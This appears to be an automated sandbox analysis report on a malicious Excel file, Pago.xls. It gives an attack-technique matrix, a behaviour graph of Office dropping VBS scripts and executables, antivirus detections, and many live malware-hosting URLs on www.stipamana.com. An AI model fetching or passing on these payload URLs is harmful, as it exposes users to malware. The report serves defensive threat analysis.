                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                Process Injection                		NTDS1
                File and Directory Discovery                		Distributed Component Object ModelInput Capture213
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets13
                System Information Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Hidden Users                		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1575112 Sample: Pago.xls Startdate: 14/12/2024 Architecture: WINDOWS Score: 100 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 Antivirus detection for URL or domain 2->55 57 22 other signatures 2->57 7 EXCEL.EXE 32 24 2->7         started        12 WINWORD.EXE 296 22 2->12         started        process3 dnsIp4 37 www.stipamana.com 87.121.86.205, 443, 49161, 49162 SKATTV-ASBG Bulgaria 7->37 25 C:\Users\user\Desktop\Pago.xls, Composite 7->25 dropped 27 C:\Users\user\AppData\Roaming\...\VIPMEUV.vbs, ASCII 7->27 dropped 29 C:\Users\user\...\cfhxdfhgjsxgfhxz[1].vbs, ASCII 7->29 dropped 59 Document exploit detected (creates forbidden files) 7->59 61 Microsoft Office drops suspicious files 7->61 14 wscript.exe 1 7->14         started        31 C:\Users\user\AppData\Roaming\...31XRWIG.exe, PE32 12->31 dropped 33 C:\Users\user\...\server1_protected[1].exe, PE32 12->33 dropped 19 NXRWIG.exe 12->19         started        file5 signatures6 process7 dnsIp8 39 www.stipamana.com 14->39 35 C:\Users\user\AppData\Local\Temp\    .doc, Composite 14->35 dropped 41 System process connects to network (likely due to code injection or exploit) 14->41 43 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->43 45 Antivirus detection for dropped file 19->45 47 Contains functionality to hide user accounts 19->47 49 Machine Learning detection for dropped file 19->49 21 NXRWIG.exe 19->21         started        23 NXRWIG.exe 19->23         started        file9 signatures10 process11

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Pago.xls47%ReversingLabsScript-Macro.Downloader.Heuristic
                Pago.xls100%AviraHEUR/Macro.Downloader.MRDO.Gen
                Pago.xls100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\ .doc100%AviraHEUR/Macro.Downloader.MRDO.Gen
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe100%AviraTR/Dropper.Gen
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\server1_protected[1].exe100%AviraTR/Dropper.Gen
                C:\Users\user\AppData\Local\Temp\ .doc100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\server1_protected[1].exe100%Joe Sandbox ML

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgtt100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/s100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjg100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg100%Avira URL Cloudmalware
                https://www.stipamana.coU0%Avira URL Cloudsafe
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjw100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhag100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfs100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdg100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfy100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkc100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjghg100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styh100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/afdtdzrhszdhthsrthsthstgs/server1_protected.exe100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghds100%Avira URL Cloudmalware
                https://www.stipamana.com/exgd100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwt100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjghg/100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyj100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdf6100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdh100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjghg/Sfbuild.doc100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdL100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhy100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjh100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhyd100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/vbsfjzbdkjsbgfzskldfbgs/cfhxdfhgjsxgfhxz.vbs100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhf100%Avira URL Cloudmalware
                http://crl.usertruH0%Avira URL Cloudsafe
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/doc100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjgh100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsj100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdh00100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfj100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/h100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrg3100%Avira URL Cloudmalware
                https://www.stipamana.com/exZZ100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsd100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/sty100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwY100%Avira URL Cloudmalware
                https://www.stipamana.com/exgLL100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerw100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagd100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghd100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsb100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwer100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/st100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhys100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfknd9100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgj100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysd100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrF100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjgh100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfj100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfx100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhg100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhyds100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/do100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgx100%Avira URL Cloudmalware
                https://www.stipamana.com/eii100%Avira URL Cloudmalware
                https://www.stipamana.s0%Avira URL Cloudsafe
                https://www.stipamana.com/exgdhfyjhydsfjh100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsf100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdsk100%Avira URL Cloudmalware
                https://www.stipamana.com/ww100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfknN100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjf100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhy100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskf100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgw100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styha100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwe100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfknds$100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgt100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqk100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjg100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjq100%Avira URL Cloudmalware
                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/d100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.stipamana.com
                		87.121.86.205
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  dns.stipamana.comfalse
                    		high
                    https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/afdtdzrhszdhthsrthsthstgs/server1_protected.exetrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjghg/Sfbuild.doctrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/vbsfjzbdkjsbgfzskldfbgs/cfhxdfhgjsxgfhxz.vbstrue
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjgwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://www.stipamana.coUwscript.exe, 00000004.00000003.380914129.0000000000353000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381010920.0000000000353000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/swscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwgwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttwscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagwscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://ocsp.entrust.net03wscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfswscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      https://www.stipamana.com/exgdhfyjhydsfjhysdgwscript.exe, 00000004.00000003.380935324.0000000000323000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381004966.000000000032B000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      https://www.stipamana.com/exgdhfywscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.380993511.00000000002FE000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkcwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjghgwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhwscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      https://www.stipamana.com/exgdwscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0wscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://www.diginotar.nl/cps/pkioverheid0wscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdswscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjghg/wscript.exe, 00000004.00000002.381039566.00000000004E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380806996.00000000003AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381024749.00000000003AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380792890.000000000037F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380778563.00000000003B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380833098.00000000037DF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381013256.0000000000367000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381085396.00000000037C4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380774855.0000000003791000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380781714.00000000003B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380781714.000000000039C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381085396.00000000037D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380789851.000000000038C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381004966.000000000032B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380800231.00000000003B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380708506.00000000037AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380743816.00000000037C6000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://www.stipamana.com/exgdhfyjwscript.exe, 00000004.00000002.380993511.00000000002FE000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdf6wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhwscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdLwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://www.stipamana.com/exgdhfyjhydsfjhywscript.exe, 00000004.00000003.380935324.0000000000323000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381004966.000000000032B000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://www.stipamana.com/exgdhfyjhwscript.exe, 00000004.00000002.380993511.00000000002FE000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://www.stipamana.com/exgdhfyjhydwscript.exe, 00000004.00000002.380993511.00000000002FE000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://www.stipamana.com/exgdhfwscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://crl.usertruHwscript.exe, 00000004.00000003.380859681.0000000003856000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380743816.0000000003856000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003856000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://www.stipamana.com/exgdh00wscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/hwscript.exe, 00000004.00000003.380935324.0000000000323000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381004966.000000000032B000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrg3wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://www.stipamana.com/exZZwscript.exe, 00000004.00000003.380914129.0000000000353000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381010920.0000000000353000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://ocsp.entrust.net0Dwscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://www.stipamana.comwscript.exe, 00000004.00000003.380914129.0000000000353000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381010920.0000000000353000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/stywscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwYwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://www.stipamana.com/exgLLwscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdwscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://crl.entrust.net/server1.crl0wscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsbwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://www.stipamana.com/exgdhfyjhydsfjhysdgjfwscript.exe, 00000004.00000003.380935324.0000000000323000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381004966.000000000032B000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://www.stipamana.com/exgdhfyjhydsfjhyswscript.exe, 00000004.00000003.380935324.0000000000323000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381004966.000000000032B000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/stwscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfknd9wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
